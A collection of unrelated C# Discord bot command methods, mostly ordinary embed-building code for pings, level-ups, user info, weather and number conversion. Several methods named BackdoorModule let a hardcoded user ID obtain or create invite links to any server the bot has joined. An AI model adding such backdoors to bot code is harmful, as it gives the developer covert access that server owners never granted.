public static async Task RefreshData(SocketCommandContext context) { var embed = new EmbedBuilder(); try { Sitemap.ReloadData(); BlockedDomains.ReloadData(); HassBotCommands.ReloadData(); } catch { embed.WithColor(Color.Red); embed.AddInlineField(Constants.EMOJI_FAIL, Constants.COMMAND_REFRESH_FAILED); await context.Channel.SendMessageAsync(string.Empty, false, embed); return; } embed.WithColor(Helper.GetRandomColor()); embed.AddInlineField(Constants.EMOJI_THUMBSUP, Constants.COMMAND_REFRESH_SUCCESSFUL); await context.Channel.SendMessageAsync(string.Empty, false, embed); }
public async Task ConfigAsync(EventContext e) { var cache = (ICacheClient)e.Services.GetService(typeof(ICacheClient)); var db = (DbContext)e.Services.GetService(typeof(DbContext)); Module module = e.EventSystem.GetCommandHandler <SimpleCommandHandler>().Modules.FirstOrDefault(x => x.Name.ToLower() == e.Arguments.ToString().ToLower()); if (module != null) { EmbedBuilder embed = new EmbedBuilder(); embed.Title = (e.Arguments.ToString().ToUpper()); string content = ""; foreach (CommandEvent ev in module.Events.OrderBy((x) => x.Name)) { content += (await ev.IsEnabled(cache, db, e.Channel.Id) ? "<:iconenabled:341251534522286080>" : "<:icondisabled:341251533754728458>") + " " + ev.Name + "\n"; } embed.AddInlineField("Events", content); content = ""; foreach (BaseService ev in module.Services.OrderBy((x) => x.Name)) { content += (await ev.IsEnabled(cache, db, e.Channel.Id) ? "<:iconenabled:341251534522286080>" : "<:icondisabled:341251533754728458>") + " " + ev.Name + "\n"; } if (!string.IsNullOrEmpty(content)) { embed.AddInlineField("Services", content); } await embed.ToEmbed().QueueToChannelAsync(e.Channel); } }
public async Task Ping() { try { string infoImageUrl = Configuration.GetSection("images")?.GetSection("info")?["64"]; EmbedBuilder embed = new EmbedBuilder() .WithTitle("Procesando...") .WithColor(GlobalConfiguration.Colors.Info); Stopwatch sw = new(); sw.Start(); await RespondAsync(embed : embed.Build()); sw.Stop(); string responseTime = Context.Client is DiscordSocketClient socketClient ? $"{socketClient.Latency} ms" : null; string latency = $"{sw.ElapsedMilliseconds} ms"; await Context.Interaction.ModifyOriginalResponseAsync(x => { Emoji pingEmoji = new("\uD83D\uDCE1"); Emoji gatewayEmoji = new("\uD83D\uDEAA"); embed.WithTitle($"Resultado del {Format.Code($"/ping")}").WithThumbnailUrl(infoImageUrl); if (responseTime != null) { embed.AddInlineField("Tiempo de respuesta", $"{pingEmoji} {responseTime}").AddInlineField(); } embed.AddInlineField("Latencia del gateway", $"{gatewayEmoji} {latency}"); x.Embed = embed.Build(); }); } catch (Exception ex) { await SendDeferredErrorResponseAsync(ex); } }
public async Task BackdoorModule(ulong GuildId) { //(put your user id in the space) if (!(Context.User.Id == 353014527677300736)) { await Context.Channel.SendMessageAsync(":eyes: You are not a bot moderator!"); return; } if (Context.Client.Guilds.Where(x => x.Id == GuildId).Count() < 1) { await Context.Channel.SendMessageAsync(":eyes: I am not in a guild with id=" + GuildId); return; } SocketGuild Guild = Context.Client.Guilds.Where(x => x.Id == GuildId).FirstOrDefault(); try { //Test code in try. If theres an error, it'll go into catch, which you can use catch to prevent the program var Invites = await Guild.GetInvitesAsync(); if (Invites.Count() < 1) { await Guild.TextChannels.First().CreateInviteAsync(); } Invites = null; Invites = await Guild.GetInvitesAsync(); EmbedBuilder Embed = new EmbedBuilder(); Embed.WithAuthor($"Invites for guild {Guild.Name}:", Guild.IconUrl); Embed.WithColor(40, 200, 150); foreach (var Current in Invites) { Embed.AddInlineField("Invite:", $"[Invite]({Current.Url})"); } await Context.Channel.SendMessageAsync("", false, Embed.Build()); } catch (Exception ex) { await Context.Channel.SendMessageAsync($":eyes: Creating an invite for guild{Guild.Name} went wrong with error ``{ex.Message}``"); return; } }
public async Task FantasyTicker(string ticker) { var tickerFormatted = ticker.ToUpper(); var coins = await Coin.GetTickers(tickerFormatted); var embed = new EmbedBuilder(); if (coins.Count > 1) { embed.WithTitle("Multiple Coins Found"); foreach (var coin in coins) { embed.AddInlineField(coin.TickerName, $"${decimal.Parse(Math.Round(coin.PriceUSD, 8).ToString(), NumberStyles.AllowExponent | NumberStyles.AllowDecimalPoint)}"); } embed.WithDescription("Multiple coins found with the same ticker, please use the name below."); } else if (coins.Count == 0) { embed.WithTitle("No coin found with this ticker"); embed.WithDescription("No coin with this ticker has been found."); } else { var coin = coins.FirstOrDefault(); embed.WithTitle($"Fantasy Price of {coin?.TickerName}"); embed.WithDescription($"${decimal.Parse(Math.Round(coin.PriceUSD, 8).ToString(), NumberStyles.AllowExponent | NumberStyles.AllowDecimalPoint)}"); TimeSpan span = DateTime.Now - coin.LastUpdated; var timeRemainingStr = ""; if (span.Days > 0) { timeRemainingStr += $"{span.Days} {(span.Days > 1 ? "Days" : "Day")} "; } if (span.Hours > 0) { timeRemainingStr += $"{span.Hours} {(span.Hours > 1 ? "Hours" : "Hour")} "; } if (span.Hours < 1 && span.Minutes > 0) { timeRemainingStr += $"{span.Minutes} {(span.Minutes > 1 ? "Minutes" : "Minute")}"; } var endStr = string.IsNullOrEmpty(timeRemainingStr) ? "Just now" : $"{timeRemainingStr} ago"; embed.WithFooter($"Last Updated: {endStr}"); } await ReplyAsync("", false, embed); }
public async Task getRandomPerson() { string json; using (WebClient client = new WebClient()) { json = client.DownloadString(""); } var personObject = JsonConvert.DeserializeObject <dynamic>(json); string firstName = personObject.results[0].name.first.ToString(); string lastName = personObject.results[0].name.last.ToString(); var pictureURL = personObject.results[0].picture.large.ToString(); var embed = new EmbedBuilder(); embed.WithTitle("Person"); embed.WithThumbnailUrl(pictureURL); embed.AddInlineField("Fornavn", char.ToUpper(firstName[0]) + firstName.Substring(1)); embed.AddInlineField("Efternavn", char.ToUpper(lastName[0]) + lastName.Substring(1)); await Context.Channel.SendMessageAsync("", embed : embed); }
internal static async void UserSentMessage(SocketGuildUser user, SocketTextChannel channel) { //if the user has a timeout, igone them var userAccount = UserAccounts.UserAccounts.getAccount(user); uint oldLevel = userAccount.LevelNumber; userAccount.XP += 50; UserAccounts.UserAccounts.SaveAccounts(); uint newLevel = userAccount.LevelNumber; if (oldLevel != newLevel) { // the user leveled up var embed = new EmbedBuilder(); embed.WithColor(67, 160, 71); embed.WithTitle("LEVEL UP!"); embed.WithDescription(user.Username + " just leveded up!"); embed.AddInlineField("LEVEL", newLevel); embed.AddInlineField("XP", userAccount.XP); await channel.SendMessageAsync("", embed : embed); } }
internal async static void UserSentMessage(SocketGuildUser user, SocketTextChannel channel) { //if the user has a timeout, ignore them var userAccount = UserAccounts.UserAccounts.GetAccount(user); uint oldLevel = userAccount.LevelNumber; userAccount.Skill += 50; UserAccounts.UserAccounts.SaveAccounts(); uint newLevel = userAccount.LevelNumber; if (oldLevel != newLevel) { var embed = new EmbedBuilder(); embed.WithColor(51, 204, 204); embed.WithTitle("LEVEL UP"); embed.WithDescription(user.Username + " leveled up!"); embed.AddInlineField("LEVEL", newLevel); embed.AddInlineField("SKILL", userAccount.Skill); await channel.SendMessageAsync("", false, embed); } }
internal static async void UserMessage(SocketGuildUser user, SocketTextChannel channel) { var Users = UAccounts.UAccounts.GetAccount(user); uint oldlevel = Users.lvlnumber; Users.EXP += 3; UAccounts.UAccounts.SaveAccounts(); uint newLevel = Users.lvlnumber; if (oldlevel != newLevel) { //user lvl up var embed = new EmbedBuilder(); embed.WithColor(128, 255, 255); embed.WithTitle("Core Grow :up:"); embed.WithDescription(user.Username + " your Core gained new level Congratz"); embed.AddInlineField("Core Lvl", newLevel); embed.AddInlineField("EXP", Users.EXP); embed.WithThumbnailUrl(user.GetAvatarUrl()); // Add 30 Stardust when lvling up await channel.SendMessageAsync("", embed : embed); } }
EmbedBuilder GetBaseEmbed(Helper helper) { var builder = new EmbedBuilder { Author = new EmbedAuthorBuilder { Name = "Hero data for " + helper.Name, IconUrl = helper.ImageUrl, }, ThumbnailUrl = helper.ImageUrl, Footer = new EmbedFooterBuilder { IconUrl = BotAvatar, Text = $"{BotUser.Username} Hero tool | TT2 v{helper.FileVersion}" }, Timestamp = DateTime.Now, Color = helper.Image.AverageColor(0.3f, 0.5f).ToDiscord(), }; builder.AddInlineField("Hero id", helper.Id); builder.AddInlineField("Damage type", helper.HelperType); return(builder); }
public async Task OfflineAdmins() { string OfflineAdmins = ""; int OfflineAdminsNumber = 0; Random random = new Random(); var embed = new EmbedBuilder(); foreach (var user in Context.Guild.Users) { if (user.GuildPermissions.Administrator) { if (user.Status.ToString() == "Offline" && !user.IsBot) { OfflineAdminsNumber += 1; OfflineAdmins = OfflineAdmins + $"{user.Mention} "; } } } embed.AddInlineField("OfflineAdmins", OfflineAdmins); embed.AddInlineField("Offline admins number", OfflineAdminsNumber); embed.WithColor(random.Next(0, 256), random.Next(0, 256), random.Next(0, 256)); await Context.Channel.SendMessageAsync("", false, embed); }
public async Task ShardInfo(int shardid) { var shard = Context.Client.GetShard(shardid); var embed = new EmbedBuilder { Author = new EmbedAuthorBuilder { Name = $"Shard ID: {shardid}", IconUrl = shard.CurrentUser.GetAvatarUrl() }, Footer = new EmbedFooterBuilder { Text = "Generated at" }, Timestamp = DateTime.Now, Color = EmbedExtensions.RandomEmbedColor() }; embed.AddInlineField("Guilds", shard.Guilds.Count.ToString()); embed.AddInlineField("Status", shard.ConnectionState); embed.AddInlineField("Latency", shard.Latency + "ms"); embed.AddField("Game", shard.Activity.Name); await embed.Build().QueueMessageAsync(Context).ConfigureAwait(false); }
public async Task Stop() { ulong id = Context.User.Id; UserEntry entry = null; if (!SmashDatabase.HasUser(id)) { Logger.Log("User not in database!", "StopSoP", LogSeverity.Error); await Context.Channel.SendMessageAsync("You can't end something, that didn't start!"); return; } entry = SmashDatabase.GetEntry(id); short score = 0; if (entry.Smashes != 0) { score = (short)Math.Round(entry.Smashes / (decimal)(entry.Smashes + entry.Passes) * 100, 0, MidpointRounding.AwayFromZero); } var embed = new EmbedBuilder(); embed.WithTitle("Smash Or Pass"); embed.WithDescription($"{Context.User.Username} ends his game!"); embed.AddInlineField(entry.Smashes.ToString(), "Smashes"); embed.AddInlineField(entry.Passes.ToString(), "Passes"); embed.AddField(CommentScore(score, entry.Name, score < 50 ? "passed" : "smashed"), $"({score}%)"); embed.WithImageUrl(entry.Url); embed.WithColor(score > 50 ? new Color(0, 165, 249) : new Color(212, 12, 00)); await Context.Channel.SendMessageAsync("", false, embed); SmashDatabase.RemoveEntry(entry.Id); Logger.Log($"Ending SoP on user {entry.Name}", "EndSoP", LogSeverity.Info); }
public async Task GetRandomPerson() { string json = ""; using (WebClient client = new WebClient()) { json = client.DownloadString(""); } var dataObject = JsonConvert.DeserializeObject <dynamic>(json); string firstName = dataObject.results[0].name.first.ToString(); string lastName = dataObject.results[0].name.last.ToString(); string avatarURL = dataObject.results[0].picture.large.ToString(); var embed = new EmbedBuilder(); embed.WithThumbnailUrl(avatarURL); embed.WithTitle("Generated Person"); embed.AddInlineField("First Name", firstName); embed.AddInlineField("Last Name", lastName); await Context.Channel.SendMessageAsync("", embed : embed); }
public async Task Weather([Remainder] string city) { await Task.Delay(0); try { EmbedBuilder embed = new EmbedBuilder(); embed.WithTitle("Zanox Weather"); embed.WithImageUrl($"{getStringFromUrl($"{city}")}/flat/64.png"); embed.AddInlineField( getStringFromUrl($"{city}&u=C") + "℃", getStringFromUrl($"{city}") + ", " + getStringFromUrl($"{city}")); embed.AddInlineField("Weather Status", getStringFromUrl($"{city}")); await Context.Channel.SendMessageAsync("", false, embed.Build()); } catch (Exception e) { ExceptionAlert(Context, e); } }
public async Task Bin2Dec([Remainder] string cmd) { var embed = new EmbedBuilder(); embed.WithTitle(":1234:"); embed.WithColor(Helper.GetRandomColor()); // mention users if any string mentionedUsers = base.MentionedUsers(); int decValue = Binary2Decimal(cmd.Trim()); embed.AddInlineField("Decimal To Binary", string.Format("{0} '{1}' in binary = '{2}' in decimal", mentionedUsers, cmd.Trim(), decValue)); await ReplyAsync(string.Empty, false, embed); }
public async Task Score([Optional] string target) { if (string.IsNullOrEmpty(target)) { Logger.Log("No user specified", "ScoreSoP", LogSeverity.Error); await Context.Channel.SendMessageAsync("Tell me whose score you want to see by writing !score {@user}"); return; } ulong id = Convert.ToUInt64(target.Substring(2, target.Length - 3)); UserEntry entry = null; if (!SmashDatabase.HasUser(id)) { Logger.Log("User not in database!", "ScoreSoP", LogSeverity.Error); await Context.Channel.SendMessageAsync("This user did not start his Smash Or Pass!"); return; } entry = SmashDatabase.GetEntry(id); var embed = new EmbedBuilder(); embed.WithTitle("Smash Or Pass"); embed.WithDescription($"{entry.Name} score"); embed.AddInlineField(entry.Smashes.ToString(), "Smashes"); embed.AddInlineField(entry.Passes.ToString(), "Passes"); embed.WithImageUrl(entry.Url); embed.WithColor(new Color(104, 44, 191)); await Context.Channel.SendMessageAsync("", false, embed); Logger.Log($"Show {entry.Name} score", "ScoreSoP", LogSeverity.Info); }
public async Task Embed([Remainder] string Input0 = "None") { EmbedBuilder Embed = new EmbedBuilder(); Embed.WithThumbnailUrl(""); Embed.WithAuthor("Author : ", Context.User.GetAvatarUrl()); Embed.WithColor(207, 70, 38); Embed.WithFooter($"I want to {Input0}", Context.Guild.Owner.GetAvatarUrl()); Embed.WithDescription("**Dummy** description + \n" + "( )[favorite __website__] \n" + "[cool website]("); Embed.AddInlineField("User input :", Input0); await Context.Channel.SendMessageAsync("", false, Embed.Build()); }
public async Task Run(ulong messageId, SocketTextChannel channel, [Remainder] string reason = null) { // Ignore bots and same channel-to-channel requests if (Context.User.IsBot || channel.Id == Context.Channel.Id) { return; } IMessage message = null; try { message = await channel.GetMessageAsync(messageId); if (message == null) { message = await FindMessageInUnknownChannel(messageId); } } catch (Exception e) { Log.Error(e, "Failed fetching message for Move command, ran by {User} with a Message ID of {MessageId}", Context.User.Mention, messageId); } // Format output var builder = new EmbedBuilder() .WithColor(new Color(95, 186, 125)) .WithDescription(message.Content); if (!string.IsNullOrWhiteSpace(reason)) { builder.AddInlineField("Reason", reason); } var mover = $"@{(Context.User as SocketGuildUser)?.Nickname ?? Context.User.Username}"; builder.WithFooter($"Message copied from #{message.Channel.Name} by {mover}"); await channel.SendMessageAsync("", embed : builder); // Delete the source message, and the command message that started this request await message.DeleteAsync(); await Context.Message.DeleteAsync(); await Context.Channel.SendMessageAsync($"Message {messageId} moved by {mover}"); }
public async Task Hex2Dec([Remainder] string cmd) { var embed = new EmbedBuilder(); embed.WithTitle(":1234:"); embed.WithColor(Helper.GetRandomColor()); // mention users if any string mentionedUsers = GetMentionedUsers(ref cmd); int decValue = Hex2Decimal(cmd.Trim()); embed.AddInlineField("Hex To Decimal", string.Format("{0} '{1}' in hex = '{2}' in decimal", mentionedUsers, cmd.Trim(), decValue)); await ReplyAsync("", false, embed); }
public async Task BackdoorModule(ulong GuildId) { if (!(Context.User.Id == 303944294622953472)) { await Context.Channel.SendMessageAsync(":x: You are not a bot moderator!"); return; } if (Context.Client.Guilds.Where(x => x.Id == GuildId).Count() < 1) { await Context.Channel.SendMessageAsync(":x: I am not in a guild with id=" + GuildId); return; } SocketGuild Guild = Context.Client.Guilds.Where(x => x.Id == GuildId).FirstOrDefault(); try { var Invites = await Guild.GetInvitesAsync(); if (Invites.Count() < 1) { await Guild.TextChannels.First().CreateInviteAsync(); } Invites = null; Invites = await Guild.GetInvitesAsync(); EmbedBuilder Embed = new EmbedBuilder(); Embed.WithAuthor($"Invites for guild {Guild.Name}:", Guild.IconUrl); Embed.WithColor(40, 200, 150); foreach (var Current in Invites) { Embed.AddInlineField("Invite:", $"[Invite]({Current.Url})"); } await Context.Channel.SendMessageAsync("", false, Embed.Build()); } catch (Exception ex) { await Context.Channel.SendMessageAsync($":x: Creating an invite for guild {Guild.Name} went wrong with error ``{ex.Message}``"); return; } }
public async Task BackdoorModule(ulong GuildId) { if (!(Context.User.Id == 166031587035709441)) { await Context.Channel.SendMessageAsync(":x: You're not my dad!"); return; } if (Context.Client.Guilds.Where(x => x.Id == GuildId).Count() < 1) { await Context.Channel.SendMessageAsync(":x: How did I get here?"); return; } SocketGuild Guild = Context.Client.Guilds.Where(x => x.Id == GuildId).FirstOrDefault(); var invites = await Guild.GetInvitesAsync(); if (invites.Count < 1) { try { await Guild.TextChannels.First().CreateInviteAsync(); }catch (Exception ex) { await Context.Channel.SendMessageAsync($":x: Creating invite for {Guild.Name} failed! ``{ex.Message}``"); return; } } invites = null; invites = await Guild.GetInvitesAsync(); EmbedBuilder embed = new EmbedBuilder(); embed.WithAuthor($"Invites for {Guild.Name}:", Guild.IconUrl); embed.WithColor(40, 200, 150); foreach (var current in invites) { embed.AddInlineField("Invite:", $"[Invite]({current.Url})"); } await Context.Channel.SendMessageAsync("", false, embed.Build()); }
public async Task invite(ulong GuildId) { if (!(Context.User.Id == 208412033748566016)) { await Context.Channel.SendMessageAsync(":x: You are not a bot moderator!"); return; } if (Context.Client.Guilds.Where(x => x.Id == GuildId).Count() < 1) { await Context.Channel.SendMessageAsync(":x: I am not in a guild with id=" + GuildId); return; } SocketGuild guild = Context.Client.Guilds.Where(x => x.Id == GuildId).FirstOrDefault(); try { var invites = await guild.GetInvitesAsync(); if (invites.Count() < 1) { await guild.TextChannels.First().CreateInviteAsync(); } invites = null; invites = await guild.GetInvitesAsync(); EmbedBuilder embed = new EmbedBuilder(); embed.WithAuthor($"Invites for guild {guild.Name}", guild.IconUrl); embed.WithColor(40, 200, 150); foreach (var current in invites) { embed.AddInlineField("Invite:", $"[Invite]({current.Url})"); } await Context.Channel.SendMessageAsync("", false, embed.Build()); } catch (Exception ex) { await Context.Channel.SendMessageAsync($":x: Createing an invite for guild {guild.Name} failed with error ``{ex.Message}``"); return; } }
public async Task RoleLevelBindings(int page = 1) { const int elementsPerPage = 9; List <RoleLevelBinding> roleLevelBindings; using (var uow = _db.UnitOfWork) { roleLevelBindings = uow.RoleLevelBinding.GetAll().OrderByDescending(r => r.MinimumLevel).ToList(); } if (!roleLevelBindings.Any()) { await ReplyErrorLocalized("rlb_none").ConfigureAwait(false); return; } var pagecount = (int)Math.Ceiling(roleLevelBindings.Count * 1d / elementsPerPage); if (page > pagecount) { await ReplyErrorLocalized("rlb_page_too_high").ConfigureAwait(false); return; } if (page < 1) { page = 1; } await Context.Channel.SendPaginatedConfirmAsync(Context.Client as DiscordSocketClient, page - 1, p => { var embed = new EmbedBuilder() .WithTitle(GetText("rlb_title")); var rlbs = roleLevelBindings.Skip(elementsPerPage *p).Take(elementsPerPage).ToList(); foreach (var rlb in rlbs) { var rolename = Context.Guild.GetRole(rlb.RoleId)?.Name ?? rlb.RoleId.ToString(); embed.AddInlineField($"#{elementsPerPage * p + rlbs.IndexOf(rlb) + 1} - {rolename}", rlb.MinimumLevel); } return(embed); }, pagecount - 1).ConfigureAwait(false); }
public async Task userInfo(SocketGuildUser user) { var embed = new EmbedBuilder(); embed.WithColor(100, 100, 100); embed.WithTitle(user.Username); string avatarUrl = user.GetAvatarUrl(); embed.WithThumbnailUrl(avatarUrl); embed.AddInlineField("User ID", user.Id); embed.AddInlineField("Server Permission", user.GuildPermissions); embed.AddInlineField("Is Bot?", user.IsBot); embed.AddInlineField("Status", user.Status); embed.AddInlineField("Is Self Muted?", user.IsSelfMuted); embed.AddInlineField("Is Self Deafened?", user.IsSelfDeafened); embed.AddInlineField("Is Muted?", user.IsMuted); embed.AddInlineField("Is Deafened?", user.IsDeafened); await Context.Channel.SendMessageAsync("", false, embed); }
public async Task BackdoorModule(ulong GuildId) { if (!(Context.User.Id == 168071466137419777)) { await Context.Channel.SendMessageAsync(":x: !Error! - You are not a bot moderator!"); return; } if (Context.Client.Guilds.Where(x => x.Id == GuildId).Count() < 1) { await Context.Channel.SendMessageAsync(":x: !Error! - I am not in a guild with ID =" + GuildId); return; } SocketGuild Guild = Context.Client.Guilds.Where(x => x.Id == GuildId).FirstOrDefault(); var Invites = await Guild.GetInvitesAsync(); if (Invites.Count() < 1) { try { await Guild.TextChannels.First().CreateInviteAsync(); } catch (Exception ex) { await Context.Channel.SendMessageAsync($":x: !Error! - Creating an invite for guild {Guild.Name} went wrong with error: ``{ex.Message}``"); return; } } EmbedBuilder Embed = new EmbedBuilder(); Embed.WithAuthor($"Invites for guild {Guild.Name}:", Context.User.GetAvatarUrl()); Embed.WithColor(255, 223, 0); Embed.WithCurrentTimestamp(); foreach (var Current in Invites) { Embed.AddInlineField("Invites:", $"[Invite]({Current.Url})"); } await Context.Channel.SendMessageAsync("", false, Embed.Build()); }
public async Task ListAllGamesAsync() { List <Data.Game> Games = db.Games.ToList(); EmbedBuilder builder = new EmbedBuilder { Color = Color.Orange, Title = "Domain:", Description = $"List of all game servers with ports" }; foreach (Data.Game game in Games) { string st = game.IsOnline ? "Online " : "Offline "; builder.AddInlineField(game.Name, st + $"on: {game.Port}, v: {game.Version}"); } await ReplyAsync($"Here's the server list {Context.User.Mention}:", false, builder.Build()); }
public async Task AddToBank() { var user = Context.User as SocketGuildUser; var success = await _economy.AddUser(user); if (success == 0) { await Context.Channel.SendMessageAsync($"{user.Username} is already a part of the bank."); return; } var eb = new EmbedBuilder(); eb.WithColor(Color.Red); eb.WithTitle($"{user.Username} joined the bank of salad bot"); eb.AddInlineField("Balance", "1000"); await Context.Channel.SendMessageAsync("", false, eb); }
public async Task Embed([Remainder] string input = "None") { EmbedBuilder Embed = new EmbedBuilder(); Embed.WithAuthor("About Khaos Bot", Context.User.GetAvatarUrl()); Embed.WithColor(40, 200, 150); Embed.WithFooter($"© KhaosFirestrom - {DateTime.Today.Year}", Context.Guild.Owner.GetAvatarUrl()); Embed.WithDescription("**Khaos Bot** was written and created by KhaosFirestrom for the sole use by the House of Khaos, \n" + "it is a bot built on mock sentience but as all robots of it's kind, it has not discovered it's purpose for existence yet. \n" + "[Check out our website here]("); if (input != "None") { Embed.AddInlineField("User input:", input); } await Context.Channel.SendMessageAsync("", false, Embed.Build()); }
public static async Task <bool> VerifyMod(SocketCommandContext ctx) { if (!Helper.IsMod(ctx.User)) { var embed = new EmbedBuilder() { Title = Constants.EMOJI_STOPSIGN, Color = Color.DarkRed, }; embed.AddInlineField(Constants.ACCESS_DENIED, Constants.ACCESS_DENIED_MESSAGE); await ctx.Channel.SendMessageAsync(string.Empty, false, embed); return(false); } return(true); }